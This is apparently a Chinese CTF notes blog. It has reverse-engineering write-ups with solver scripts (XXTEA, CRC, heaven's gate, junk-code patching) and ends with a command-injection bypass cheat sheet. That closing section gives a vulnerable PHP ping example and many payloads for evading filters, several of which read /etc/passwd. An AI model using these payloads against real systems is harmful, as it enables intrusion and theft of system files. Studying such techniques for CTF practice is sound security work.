Destination

挂上TitanHide,注意到NtSetInformationThread, NtGetContextThread这两个反调试
x64dbg断下后在线程开始ret即可。
NtSetInformationThread会使当前线程从调试器隐藏,调试器跑飞
NtGetContextThread可以获取到当前线程的寄存器状况,用来检测DR寄存器来反硬件断点
还有一个反调试是我进入后发现的,主线程卡住,但是线程窗口里面有一个线程一直在Sleep(1);,于是干掉就行了。

于是我们就得到了第一个patch的附件,我们以这个附件为基础继续调。
注意到我们输入完flag之后给我们来了个int3,导致进入SEH流程,如下图所示。
2024-08-20T18:01:48.png
图中框起来的是SEH处理函数,我们进去后,显然是似了。
2024-08-20T18:02:35.png
我们观察到,这些花指令由2种构成
1.call $+5; add [esp], 5; retn
2.jnz addr; jz addr
显然第一种可以化简为nop,第二种我们可以化简为jmp addr
处理脚本如下

from pwn import u32, u8
binfile = open("Destination_patched_2.exe","rb").read()
 
founds = []
# find all junkcode
index = 0
while True:
    index = binfile.find(b'\xE8\x00\x00\x00\x00\x83\x04\x24\x05\xC3',index+1) #! index+1 ! 不然死循环了...
    if index == -1:
        break
    founds.append(index)
    print(index)
binfile = bytearray(binfile)
for i in founds:
    print(binfile[i:i+10])
    for j in range(i,i+10):
        binfile[j] = 0x90
    print(binfile[i:i+10])
# find all junkcode
index = 0
while True:
    i = binfile.find(b'\x0f\x84',index+1)
    index = i
    if i == -1:
        break
    if binfile[index+6:index+8] == b'\x0f\x85' and u32(binfile[index+2:index+6]) - u32(binfile[index+8:index+12]) == 6:
        binfile[i] = 0x90
        binfile[i+1] = 0xe9
        binfile[i+7] = 0x66
        binfile[i+8] = 0x0f
        binfile[i+9] = 0x18
        binfile[i+10] = 0x20
        binfile[i+11] = 0x90

index = 0
while True:
    i = binfile.find(b'\x74',index+1)
    index = i
    if i == -1:
        break
    if binfile[i+2] == 0x75 and binfile[i+1] - binfile[i+3] == 2:
        binfile[i] = 0xeb
        binfile[i+2] = 0x90
        binfile[i+3] = 0x90
        binfile[i+4] = 0x90

# replace all matches
print(open("Destination_p3.exe","wb").write(binfile))

处理完花指令后,我们进入Ghidra,直接当成Func,然后手动处理一点东西,就得到了:
2024-08-20T18:05:47.png


void xxtea(void)

{
  uint e;
  uint sum;
  uint z;
  uint i;
  int round;
  uint y;
  
  round = 50;
  sum = 0;
  z = src[0xb];
  do {
    sum += 0xa4b46062;
    e = sum >> 2 & 3;
    src[0xb] = z;
    for (i = 0; i < 11; i += 1) {
      y = src[i + 1];
      z = src[i] + ((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (key[i & 3 ^ e] ^ z));
      src[i] = z;
    }
    z = src[0xb] +
        ((z >> 5 ^ src[0] << 2) + (src[0] >> 3 ^ z << 4) ^ (sum ^ src[0]) + (key[i & 3 ^ e] ^ z));
    src[0xb] = z;
    round += -1;
  } while (round != 0);
  return;
}

显然的xxtea。
分析完这个后,我们下硬件断点,发现没断下来而且值还被改了,我们回到主函数,找到这个地址
2024-08-20T18:09:13.png
有一个jmp far
2024-08-20T18:09:26.png
ida的反汇编这里有点问题,我们x32dbg看一看,发现是jmp far 0x33:xxxxx
2024-08-20T18:10:09.png
这是windows下的天堂之门,0x23就是转32位,0x33就是转64位运行,这个是CS寄存器的值。
我们把jmp far的目标地址函数dump下来,放到一个二进制文件,拖入ida,选中64 bit mode,就可以看到真正的源码了。
2024-08-20T18:11:37.png
可以注意到,这是一个已经玩烂的不安全CRC,它曾出现在:北邮去年招新赛的五子棋程序逆向、D^3CTF,moectf2024中。
提供两种解法,第一种就是z3-Solver

from z3 import *
from copy import deepcopy
s = Solver()
x = [BitVec(f"x{i}", 32) for i in range(12)]
y = deepcopy(x)
ans = [0xA790FAD6, 0xE8C8A277, 0xCF0384FA, 0x2E6C7FD7, 0x6D33968B, 0x5B57C227, 0x653CA65E, 0x85C6F1FC, 0xE1F32577, 0xD4D7AE76, 0x3FAF6DC4, 0x0D599D8C]
print(len(ans))
for i in range(12):
    for j in range(32):
        x[i] = If(LShR(x[i], 31) == 1, 2*x[i] ^ 0x84A6972F, 2*x[i])
    s.add(x[i] == ans[i])
print(s.check())
print(s.model())
'''
12
sat
[x1 = 1585230664,
 x10 = 950802794,
 x0 = 2656343363,
 x3 = 2246810078,
 x7 = 688747158,
 x11 = 422273590,
 x9 = 2522199337,
 x4 = 3061995652,
 x5 = 3304541857,
 x6 = 582058634,
 x8 = 428794995,
 x2 = 3651684911]
'''

也是最方便的,下面的解法是按照原理来的:
由于由于左移会变偶数,而xor后又会变成奇数,所以有唯一解。
我们先获取最低位是否为1,如果是1,说明是奇数,如果为奇数,说明它刚刚走的是最高位是1的那条分支,也说明它异或了立即数,我们直接给它异或回来,然后右移1,由于我们已经确定最高位是1,我们给它补上1即可。
如果最低位是0,我们就直接右移1,然后确定最高位是0即可。

解密脚本

#include <iostream>
#include <Windows.h>
// n = 12
typedef DWORD uint;
void xxtea(uint32_t* src, int n, uint32_t const key[4])
{

    if (n > 0) /* Coding Part */
    {
        uint e;
        uint sum;
        uint z;
        uint i;
        int round;
        uint y;

        round = 50;
        sum = 0;
        z = src[0xb];
        do {
            sum += 0xa4b46062;
            e = sum >> 2 & 3;
            src[n - 1] = z;
            for (i = 0; i < n - 1; i += 1) {
                y = src[i + 1];
                z = src[i] + ((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (key[i & 3 ^ e] ^ z));
                src[i] = z;
            }
            z = src[n - 1] +
                ((z >> 5 ^ src[0] << 2) + (src[0] >> 3 ^ z << 4) ^ (sum ^ src[0]) + (key[i & 3 ^ e] ^ z));
            src[n - 1] = z;
            round += -1;
        } while (round != 0);
    }
    else if (n <= 0)
    {
        uint32_t y, z, sum;
        unsigned p, rounds, e;

        n = -n;
        rounds = 50;
        sum = rounds * 0xa4b46062;
        y = src[0];
        do
        {
            e = (sum >> 2) & 3;
            for (p = n - 1; p > 0; p--)
            {
                z = src[p - 1];
                y = src[p] -= ((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (key[p & 3 ^ e] ^ z));
            }
            z = src[n - 1];
            y = src[0] -= ((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (key[p & 3 ^ e] ^ z));
            sum -= 0xa4b46062;
        } while (--rounds);

    }
}

unsigned char a[] = {0xd6, 0xfa, 0x90, 0xa7, 0x77, 0xa2, 0xc8, 0xe8, 0xfa, 0x84, 0x03, 0xcf, 0xd7, 0x7f, 0x6c, 0x2e, 0x8b, 0x96, 0x33, 0x6d, 0x27, 0xc2, 0x57, 0x5b, 0x5e, 0xa6, 0x3c, 0x65, 0xfc, 0xf1, 0xc6, 0x85, 0x77, 0x25, 0xf3, 0xe1, 0x76, 0xae, 0xd7, 0xd4, 0xc4, 0x6d, 0xaf, 0x3f, 0x8c, 0x9d, 0x59, 0x0d};
//unsigned char a[] = "flag{111111111111111111111111111111111111111}";
unsigned char k[] = {0x6b, 0x7a, 0x0e, 0x6b, 0xee, 0x11, 0x30, 0xd1, 0x6d, 0x2c, 0xe1, 0xa7, 0xa6, 0xac, 0x99, 0xc1 };
int main()
{
    for (int i = 0; i < 12; i++)
    {
        uint32_t n = *(i + (uint32_t*)a);
        for (int j = 0; j < 32; j++)
        {
            if (n & 1)
            {
                n ^= 0x84A6972F;
                n >>= 1;
                n |= 0x80000000;
            }
            else
            {
                n >>= 1;
                n &= 0x7fffffff;
            }
        }
        *(i + (uint32_t*)a) = n;
    }

    xxtea((uint32_t*)a, -12, (uint32_t*)k);
    xxtea((uint32_t*)a, -12, (uint32_t*)k);
    std::cout << a; //DubheCTF{82e1e3f8-85fe469f-8499dd48-466a9d60}
    return 0;
}

regadgets 版本的xxtea exp

from regadgets import *
k = [0x6b, 0x7a, 0x0e, 0x6b, 0xee, 0x11, 0x30, 0xd1, 0x6d, 0x2c, 0xe1, 0xa7, 0xa6, 0xac, 0x99, 0xc1]
k4 = byte2dword(k)
enc = byte2dword(bytes.fromhex("""
43 95 54 9e 48 b3 7c 5e 2f 4a a8 d9 de 99 eb 85
84 58 82 b6 a1 4e f7 c4 8a 82 b1 22 96 72 0d 29
73 e4 8e 19 29 b5 55 96 6a 19 ac 38 36 62 2b 19
"""))


dec = xxtea_decrypt(enc, k4, delta=0xa4b46062, additional_rounds=40)
dec = xxtea_decrypt(dec, k4, delta=0xa4b46062, additional_rounds=40)

print(dword2bytes(dec))

[ACTF新生赛2020] Oruga

抄出来爆破

#include <iostream>

unsigned char byte_201020[256] = {
    0x00, 0x00, 0x00, 0x00, 0x23, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x23, 0x23, 0x23, 0x23,
    0x00, 0x00, 0x00, 0x23, 0x23, 0x00, 0x00, 0x00, 0x4F, 0x4F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4F, 0x4F, 0x00, 0x50, 0x50, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x4C, 0x00, 0x4F, 0x4F, 0x00, 0x4F, 0x4F, 0x00, 0x50, 0x50, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x4C, 0x00, 0x4F, 0x4F, 0x00, 0x4F, 0x4F, 0x00, 0x50, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x4C, 0x4C, 0x00, 0x4F, 0x4F, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x4F, 0x4F, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0x00, 0x00,
    0x23, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x23, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x4D, 0x4D, 0x00, 0x00, 0x00, 0x23, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x4D, 0x4D, 0x00, 0x00, 0x00, 0x00, 0x45, 0x45,
    0x00, 0x00, 0x00, 0x30, 0x00, 0x4D, 0x00, 0x4D, 0x00, 0x4D, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x45, 0x45,
    0x54, 0x54, 0x54, 0x49, 0x00, 0x4D, 0x00, 0x4D, 0x00, 0x4D, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00,
    0x00, 0x54, 0x00, 0x49, 0x00, 0x4D, 0x00, 0x4D, 0x00, 0x4D, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00,
    0x00, 0x54, 0x00, 0x49, 0x00, 0x4D, 0x00, 0x4D, 0x00, 0x4D, 0x21, 0x00, 0x00, 0x00, 0x45, 0x45
};

int __fastcall sub_78A(const char* src)
{
    int v2; // [rsp+Ch] [rbp-Ch]
    int v3; // [rsp+10h] [rbp-8h]
    int v4; // [rsp+14h] [rbp-4h]

    v2 = 0;
    v3 = 5;
    v4 = 0;
    while (byte_201020[v2] != 0x21)
    {
        v2 -= v4;
        if (src[v3] != 'W' || v4 == -16)
        {
            if (src[v3] != 'E' || v4 == 1)
            {
                if (src[v3] != 'M' || v4 == 0x10)
                {
                    if (src[v3] != 'J' || v4 == -1)
                        return v3 + 1;
                    v4 = -1;
                }
                else
                {
                    v4 = 16;
                }
            }
            else
            {
                v4 = 1;
            }
        }
        else
        {
            v4 = -16;
        }
        ++v3;
        while (!byte_201020[v2])
        {
            if (v4 == -1 && (v2 & 0xF) == 0)
                return v3;
            if (v4 == 1 && v2 % 16 == 15)
                return v3;
            if (v4 == 16 && (unsigned int)(v2 - 240) <= 0xF)
                return v3;
            if (v4 == -16 && (unsigned int)(v2 + 15) <= 0x1E)
                return v3;
            v2 += v4;
        }
    }
    return v3 + 1;
}

int main()
{
    int i;
    char* src = (char*)malloc(40);
    if (!src) return -1;
    memcpy_s(src, 40, "actf{", 5);
    int last = 5;
    for (i = 0; i < 40; i++)
    {
        src[6 + i] = 0;
        src[5 + i] = 'W';
        if (sub_78A(src) == i + 6)
        {
            src[5 + i] = 'J';
            if (sub_78A(src) == i + 6)
            {
                src[5 + i] = 'M';
                if (sub_78A(src) == i + 6)
                {
                    src[5 + i] = 'E';
                    if (sub_78A(src) == i + 6)
                    {
                        src[5 + i] = '}';
                        if (sub_78A(src) == i + 6)
                        {
                            break;
                        }
                    }
                }
            }
        }
    }

    printf("%s", src);
    free(src);
}

actf{MEWEMEWJMEWJM}

[WUSTCTF2020] level4

2024-08-01T10:33:50.png
题目给了中序和后序排列

Practice my Data Structure code.....
Typing....Struct.....char....*left....*right............emmmmm...OK!
Traversal!
Traversal type 1:2f0t02T{hcsiI_SwA__r7Ee}
Traversal type 2:20f0Th{2tsIS_icArE}e7__w
Traversal type 3:    //type3(&x[22]);   No way!

显然缺了个前序排列,应该就是结果
我们用Python解

def ToPreOrder(Postorder,Inorder):
    length = len(Postorder)
    if length == 0:
        return 0
    root = Postorder[length-1]
    for i in range(length):
        if root == Inorder[i]:
            break
    print(root,end="")
    ToPreOrder(Postorder[0:i],Inorder[0:i])
    ToPreOrder(Postorder[i:length-1],Inorder[i+1:length])
    
ToPreOrder("20f0Th{2tsIS_icArE}e7__w","2f0t02T{hcsiI_SwA__r7Ee}")
# wctf2020{This_IS_A_7reE}

[GUET-CTF2019] number_game

树中序和后序排列,动调一下可以拿到替换表。
2024-08-02T02:39:34.png
然后再分析一下,可以得知,相邻行/列不能相同,且输入只能是0 1 2 3 4这五个字符。
2024-08-02T02:39:47.png
写出z3-solver脚本即可。

from z3 import *
x = [BitVec(f"x{i}", 8) for i in range(25)]
s = Solver()

raw = """
1 4 # 2 3
3 0 # 1 #
0 # 2 3 #
# 3 # # 0
4 2 # # 1
"""

raw = "".join(raw.replace(' ', '').splitlines())
for i, v in enumerate(raw):
    if v != '#':
        s.add(x[i] == ord(v))
    else:
        s.add(x[i] >= ord('0'), x[i] <= ord('4'))

for i in range(5):
    for j in range(5):
        for k in range(j + 1, 5):
            s.add(x[5 * i + j] != x[5 * i + k])
            s.add(x[5 * j + i] != x[5 * k + i])


print(s)
print(s.check())
m = s.model()
ans = ""

for i in x:
    ans += chr(m[i].as_long())

for i in range(5):
    for j in range(5):
        print(ans[5*i+j], end=' ')
    print("")


# Tree transform
d_before = "0123456789"
d_after = "7381940526"
d_table = [d_before.index(d_after[i]) for i in range(len(d_before))]
print("table", d_table)

answers = [2, 7, 9, 11, 14, 15, 17, 18, 22, 23]
flag_ans = [i for i in range(10)]
for i in range(len(answers)):
    flag_ans[d_table[i]] = ans[answers[i]]

flag = "".join(flag_ans)
print(flag)
sat
1 4 0 2 3 
3 0 4 1 2
0 1 2 3 4
2 3 1 4 0
4 2 3 0 1
table [7, 3, 8, 1, 9, 4, 0, 5, 2, 6]
1134240024

flag{1134240024}

[2019红帽杯]xx

xxtea, S-box, 每3位为一组,每一组迭代异或。
xxtea用regadgets解,key是输入的前四个字符,我们认为输入前四个字符就是flag。
S盒用输入输出造一个,迭代异或用z3解。

from regadgets import *
from copy import deepcopy
from z3 import *
k = byte2dword(b'flag' + b'\x00' * 12)
print('key', k)

# Use My input and the data after s-box trans to make S-BOX.
enc1_s = bytes.fromhex('B5 B4 16 CB 6B CA 9C DB B9 DE C7 8E 56 94 77 66 EE AB 00 D6 0C 42 3C 70')
enc1_r = bytes.fromhex('B4 CB B5 16 CA DB 6B 9C DE 8E B9 C7 94 66 56 77 AB D6 EE 00 42 70 0C 3C')

enc = [0x6B40BCCE, 0xC0953A7C, 0x20209BEF, 0x3502F791, 0xC8021823, 0xFA5656E7]
enc = dword2byte(enc)

inv_s_box = [enc1_s.index(i) for i in enc1_r]
# s_box = [enc1_r.index(i) for i in enc1_s]

# Use Z3-Solver to solve.
s = Solver()
x = [BitVec(f"x{i}", 8) for i in range(24)]
y = deepcopy(x)
for i in range(3, 24):
    for j in range(i // 3):
        x[i] ^= x[j]

for i in range(len(enc)):
    s.add(enc[i] == x[i])
if s.check() != sat:
    print("no solve")
    exit(0)
m = s.model()
result = []
for i in y:
    result.append(m[i].as_long())

result = [result[inv_s_box[i]] for i in range(len(result))]
result = xxtea_decrypt(byte2dword(result), k, debug=True)
print(dword2byte(result))
# b'flag{CXX_and_++tea}\x00\x13\x00\x00\x00'

[2019红帽杯]childRE

非常有意思的一道题,首先是对于输入的flag进行一个树的后序遍历,然后是UnDecorateSymbolName(SymbolName指的是C++的编译后函数名称修饰),然后就是一个查表就解决了。
exp

from regadgets import *
from hashlib import md5
str1 = [0x28, 0x5F, 0x40, 0x34, 0x36, 0x32, 0x30, 0x21, 0x30, 0x38, 0x21, 0x36, 0x5F, 0x30, 0x2A, 0x30, 0x34, 0x34, 0x32, 0x21, 0x40, 0x31, 0x38, 0x36, 0x25, 0x25, 0x30, 0x40, 0x33, 0x3D,
        0x36, 0x36, 0x21, 0x21, 0x39, 0x37, 0x34, 0x2A, 0x33, 0x32, 0x33, 0x34, 0x3D, 0x26, 0x30, 0x5E, 0x33, 0x26, 0x31, 0x40, 0x3D, 0x26, 0x30, 0x39, 0x30, 0x38, 0x21, 0x36, 0x5F, 0x30, 0x2A, 0x26]
str2 = [0x35, 0x35, 0x35, 0x36, 0x35, 0x36, 0x35, 0x33, 0x32, 0x35, 0x35, 0x35, 0x35, 0x32, 0x32, 0x32, 0x35, 0x35, 0x36, 0x35, 0x35, 0x36, 0x35, 0x35, 0x35, 0x35, 0x32, 0x34, 0x33, 0x34,
        0x36, 0x36, 0x33, 0x33, 0x34, 0x36, 0x35, 0x33, 0x36, 0x36, 0x33, 0x35, 0x34, 0x34, 0x34, 0x32, 0x36, 0x35, 0x36, 0x35, 0x35, 0x35, 0x35, 0x35, 0x32, 0x35, 0x35, 0x35, 0x35, 0x32, 0x32, 0x32]
xxx = [0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x5B, 0x5D, 0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F,
       0x50, 0x7B, 0x7D, 0x61, 0x73, 0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3B, 0x27, 0x41, 0x53, 0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3A, 0x22, 0x5A, 0x58, 0x43, 0x56, 0x42, 0x4E, 0x4D, 0x3C, 0x3E, 0x3F, 0x7A, 0x78, 0x63, 0x76, 0x62, 0x6E, 0x6D, 0x2C, 0x2E, 0x2F]
r = []
for i in range(62):
    a = xxx.index(str1[i])
    b = xxx.index(str2[i])
    r.append(b * 23 + a)
# private: char * __thiscall R0Pxx::My_Aut0_PWN(unsigned char *)
print(bytes(r))

# 手动转换一下 查表
r = b'?My_Aut0_PWN@R0Pxx@@AAEPADPAE@Z'

data_from = b'abcdefghijklmnopqrstuvwxyz12345'
data_to = b'pqhrsidtujvwkebxylz1mf23n45ogca'
_, ibox = generate_sbox(data_from, data_to)
r = sbox_transform(r, ibox)

print(bytes(r))
print(f"flag{{{md5(bytes(r)).hexdigest()}}}")
# flag{63b148e750fed3a33419168ac58083f5}

学习了一下gcc和vs的名称粉碎(装饰)

修饰规则

C++ 的修饰规则为 “? + 函数名 + 标识符”

标识符的第一部分

标识符的第一部分是调用规则说明:

类型符号
intH
charD
voidX
unsigned intI
unsigned charE
floatM
doubleN
bool_N
structU

标识符的第二部分

标识符的第二部分依次是返回值和函数参数的类型:

其中,如果类型是指针,则在标识符前增加 PA;如果是 const 类型的指针,则增加 PB。对于结构体,则在 U 后面添加结构体的名称,并以 @@ 结尾。

标识符的第三部分

标识符的第三部分是结束符:

  • 如果函数有参数,则以 “@Z” 结束,否则以 “Z” 结束。

函数名的第一部分

函数名的第一部分是函数的本名。如果该函数不是类的成员,那么就只有第一部分。

函数名的第二部分

对于类的成员的不同属性有如下规则:

属性无 const有 const
public@@QAE@@QBE
protected@@IAE@@IBE
private@@AAE@@ABE

同时取消标识符的第一部分。此时如果参数为类实例引用,则改为 “AAV1”,带 const 改为 “ABV1”。

例子

对于以下函数:

int Function1(char*, unsigned char);
struct mytype {
    int x, y;
};

class CTest { 
private: 
    void Function1(int); 
protected: 
    void Function2(const CTest &src); 
public: 
    void Function3(mytype*, int);
};

其中:

Function1 的修饰应当为:?Function1@CTest@@AAEXH@Z
Function2 的修饰应当为:?Function2@CTest@@IAEXABV1@Z
Function3 的修饰应当为:?Function3@CTest@@QAEXPAUmytype@@H@Z

[NPUCTF2020]你好sao啊

from regadgets import *

table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz01234{}789+/="
enc = bytes(qword2byte([0xFD370FEB59C9B9E, 0xDEAB7F029C4FD1B2, 0xFACD9D40E7636559]))

print(enc)
enc_bin = bin(b2l(enc))[2:]
print(enc_bin)
for i in range(0, len(enc_bin), 6):
    v = enc_bin[i:i+6]
    print(table[int(v, 2)], end='')

# b'\x9e\x9b\x9c\xb5\xfep\xd3\x0f\xb2\xd1O\x9c\x02\x7f\xab\xdeYec\xe7@\x9d\xcd\xfa'
# 100111101001101110011100101101011111111001110000110100110000111110110010110100010100111110011100000000100111111110101011110111100101100101100101011000111110011101000000100111011100110111111010
# npuctf{w0w+y0U+cAn+r3lllY+dAnc3}

[RoarCTF2019]polyre

d810 反混淆,然后CRC64,用z3解。

from regadgets import *
from z3 import *
from copy import deepcopy
enc = b"\x96\x62\x53\x43\x6D\xF2\x8F\xBC\x16\xEE\x30\x05\x78\x00\x01\x52\xEC\x08\x5F\x93\xEA\xB5\xC0\x4D\x50\xF4\x53\xD8\xAF\x90\x2B\x34\x81\x36\x2C\xAA\xBC\x0E\x25\x8B\xE4\x8A\xC6\xA2\x81\x9F\x75\x55\xB3"
def decrypt(x):
    s = Solver()
    y = BitVec("x", 64)
    z = deepcopy(y)
    for i in range(64):
        y = If(LShR(y, 63) == 1, (y*2) ^ 0xB0004B7679FA26B3, y * 2)
    s.add(y == x)
    print(s.check())
    m = s.model()
    return qword2byte(m[z].as_long())


r = b''
for i in range(0, len(enc), 8):
    r += decrypt(byte2qword(enc[i:i+8])[0])
print(r)

写在开头

你首先需要了解题目对于字符串的过滤与禁用情况,所以建议搭配Fuzz进行使用。

命令分割

如果给你这样的php

<?php
    $ip = $_GET['ip'];
    system("ping -c 4 " . $ip);
?>

显然ip可控,所以你需要构造一个payload使得你的命令被正确执行。

各种分割策略如下

  • ; (Semicolon): Allows you to execute multiple commands sequentially.
  • && (AND): Execute the second command only if the first command succeeds (returns a zero exit status).
  • || (OR): Execute the second command only if the first command fails (returns a non-zero exit status).
  • & (Background): Execute the command in the background, allowing the user to continue using the shell.
  • | (Pipe): Takes the output of the first command and uses it as the input for the second command.
command1; command2   # Execute command1 and then command2
command1 && command2 # Execute command2 only if command1 succeeds
command1 || command2 # Execute command2 only if command1 fails
command1 & command2  # Execute command1 in the background
command1 | command2  # Pipe the output of command1 into command2

空格绕过

1.$IFS$9 ${IFS} $IFS
cat$IFS$9/flag
2.<字符的使用
Input redirection. The < character tells the shell to read the contents of the file specified.
cat</flag cat</etc/passwd
3.ANSI-C Quoting

X=$'uname\x20-a'&&$X

4.Tab绕过
The tab character can sometimes be used as an alternative to spaces. In ASCII, the tab character is represented by the hexadecimal value 09.
;ls%09-al%09/home
5.换行绕过
Commands can also be run in sequence with newlines

original_cmd_by_server
ls

字符匹配绕过

1.如下面几种引号成双出现的时候可以分开字符,特别注意{}中间要加一个,而且加一个{,}后,命令就会多执行一次
c``a""t f{,}l``a''g
2.通过echo -e来转义
echo -e '\x31' 将会输出1 echo -e '\x2f\x66\x6c\x61\x67' 则会输出/flag
还有下面一些

swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd

swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd

swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd

swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash

3.反斜杠换行绕过

  • Commands can be broken into parts by using backslash followed by a newline

    $ cat /et\
    c/pa\
    sswd
  • URL encoded form would look like this:

    cat%20/et%5C%0Ac/pa%5C%0Asswd

4.通过命令绕过(在斜杠被屏蔽时)
Commands execution without backslash and slash - linux bash

swissky@crashlab:~$ echo ${HOME:0:1}
/

swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ echo . | tr '!-0' '"-1'
/

swissky@crashlab:~$ tr '!-0' '"-1' <<< .
/

swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash

比如这个${HOME:0:1}还有其他玩法,这个相当于是取了env中的HOME来进行截断,你可以先取env然后观察里面是否有你想要的字符,然后再进行截断即可进行绕过
5.通过斜杠与反斜杠来绕过

w\ho\am\i
/\b\i\n/////s\h

6.通过$@来绕过
$0: Refers to the name of the script if it's being run as a script. If you're in an interactive shell session, $0 will typically give the name of the shell.

who$@ami
echo whoami|$0

7.通过$()来绕过

who$()ami
who$(echo am)i
who`echo am`i

8.可变扩展绕过

sh-5.2# echo /???
/bin /dev /etc /lib /mnt /opt /run /srv /sys /tmp /usr /var
sh-5.2# echo /???/??
/bin/ar /bin/as /bin/cp /bin/dd /bin/df /bin/du /bin/id /bin/ip /bin/ld /bin/ln /bin/ls /bin/mv /bin/nc /bin/nl /bin/nm /bin/od /bin/pg /bin/pr /bin/ps /bin/rm /bin/sg /bin/sh /bin/ss /bin/su /bin/tc /bin/tr /bin/ul /bin/wc /bin/xz /dev/fd /lib/tc /sys/fs /var/db
sh-5.2# echo /???/???
/bin/arp /bin/awk /bin/cal /bin/cat /bin/cmp /bin/col /bin/ctr /bin/cut /bin/dcb /bin/dir /bin/dwp /bin/env /bin/fmt /bin/gdb /bin/gio /bin/git /bin/gpg /bin/gpm /bin/jar /bin/jdb /bin/jps /bin/ksu /bin/ldd /bin/lz4 /bin/mev /bin/mvn /bin/php /bin/pip /bin/psl /bin/ptx /bin/pwd /bin/rev /bin/scp /bin/sed /bin/seq /bin/sln /bin/ssh /bin/sum /bin/tac /bin/tar /bin/tee /bin/tic /bin/toe /bin/top /bin/tty /bin/vim /bin/who /bin/xjc /bin/xxd /bin/yes /bin/zic /bin/zip /bin/zsh /dev/bus /dev/cpu /dev/dri /dev/fb0 /dev/log /dev/mem /dev/net /dev/ppp /dev/pts /dev/rtc /dev/shm /dev/snd /dev/tty /dev/vcs /dev/vda /dev/vdb /etc/X11 /etc/cni /etc/gdb /etc/iwd /etc/php /etc/rpc /etc/ssh /etc/ssl /etc/xdg /etc/zsh /lib/awk /lib/gio /lib/icu /lib/iwd /lib/jvm /lib/lua /lib/php /lib/ssh /lib/tar /lib/zsh /run/log /srv/ftp /sys/bus /sys/dev /usr/bin /usr/lib /usr/src /var/lib /var/log /var/opt /var/run /var/tmp
sh-5.2# echo /???/??t
/bin/cat /bin/cut /bin/fmt /bin/git /dev/net /var/opt

显然/???/??t可以拿到我们的cat,直接执行,会把/bin/cut....到/var/opt这些东西都当作cat的参数进行输入
所以我们附加在后面使用/???/p??s??来获取到/bin/passwd /etc/passwd /etc/pkcs11 /lib/pkcs11
/???/??t /???/p??s??就可以拿到我们想要的/etc/passwd了,当然如果过滤没有那么严,可以把?换成几个正确的来减少匹配到的东西的个数。
echo /???/../f***当然这样可以匹配到根目录下的flag
当然不光可以使用上面方法直接cat,我们也可以定义变量

test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}

9.wildchar绕过

powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc

时间忙注(大嘘)

swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

如果匹配对了,那么就sleep 5s这样就很显然

内联执行

通过 `` 可以实现,如 cat `ls` 则先会执行ls,把ls的结果作为输入的字符串再cat,这样的操作结果是输出当前目录下ls出来的所有文件。
